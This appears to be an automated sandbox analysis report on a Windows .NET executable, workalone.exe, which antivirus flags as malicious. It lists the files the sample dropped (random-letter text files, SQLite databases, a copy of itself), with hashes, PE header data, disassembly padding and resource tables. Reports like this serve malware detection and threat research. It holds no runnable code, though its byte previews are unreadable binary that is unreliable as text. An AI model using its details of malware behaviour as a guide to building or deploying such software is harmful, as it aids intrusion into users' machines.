                                                          Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.691266297898928
                                                          Encrypted:false
                                                          SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                          MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                          SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                          SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                          SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                          Malicious:false
                                                          Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.698711683401115
                                                          Encrypted:false
                                                          SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                          MD5:47643CE7571E0C995094D7CE5F2005D7
                                                          SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                          SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                          SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                          Malicious:false
                                                          Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.69486718145169
                                                          Encrypted:false
                                                          SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                          MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                          SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                          SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                          SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                          Malicious:false
                                                          Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694142261581685
                                                          Encrypted:false
                                                          SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                          MD5:E9AA17F314E072EBB015265FB63E77C0
                                                          SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                          SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                          SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                          Malicious:false
                                                          Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):348672
                                                          Entropy (8bit):5.276672751026678
                                                          Encrypted:false
                                                          SSDEEP:3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
                                                          MD5:68F42F485ECE93306BEF1E4084D3052E
                                                          SHA1:C63F1A56D12A0ACBF5E9A354D8A66C6E17AF2309
                                                          SHA-256:5D526BE000146CF9CF94F7EF6F4E86929D508E17CA483B03D4ECBD2D52E071C9
                                                          SHA-512:75E09E7505039A7EB0D0652666F3ED258D50C2536BB3877C2E1503E69700AAE6A8014EF6B8F4F7F41BFA11F857CF0240F1A950F66395D19AE12707DB863C1242
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@..................................o..J.................................................................................... ............... ..H............text...LP... ...R.................. ..`.rsrc................T..............@..@.reloc...............P..............@..B................,p......H............a..........p.................................................(W...*.0..U.......~.... ....(t....-.&~....~....(.....(....&..,.&.#.+..+..~.....(....~.....(....sX...z.*...........66.......0..........~Y....:....&sZ....9....&~.....~.... ....(t....:}...&&&~.....~.... ....(t....-l&&&~.....~....~.... ....(t....(.....,M&&&~.......,G&&&.-..9......~.....(....&~....(....&...-.8h...(....8|...(....+.(....+.(....+.&...,....9#....*.8'.......................0..^........-i~....~...
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):5.276672751026678
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:workalone.exe
                                                          File size:348672
                                                          MD5:68f42f485ece93306bef1e4084d3052e
                                                          SHA1:c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
                                                          SHA256:5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
                                                          SHA512:75e09e7505039a7eb0d0652666f3ed258d50c2536bb3877c2e1503e69700aae6a8014ef6b8f4f7f41bfa11f857cf0240f1a950f66395d19ae12707db863c1242
                                                          SSDEEP:3072:kd4jFS378hlr02cpbHrxfV0WzJsQuJpnpvcPavg3igp06mLkXDQWmE6:W378ib70cWpnv2+6mLkzQE6
                                                          TLSH:747439267384DF26C79223B7C6035BA002184C197785EE76A4E529FC94A1FFAD9CF193
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PT.c.................R..........Fp... ........@.. ....................................@................................
                                                          Icon Hash:64c68eb2b3b686c4
                                                          Entrypoint:0x427046
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x63865450 [Tue Nov 29 18:49:52 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x26ffc0x4a.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x2faa4.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x2504c0x25200False0.8109743265993266data7.585773646811085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x280000x2faa40x2fc00False0.08600908049738219data2.4474216242910125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x580000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x280b40x13caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                          RT_ICON0x294a20x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584
                                                          RT_ICON0x39cee0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016
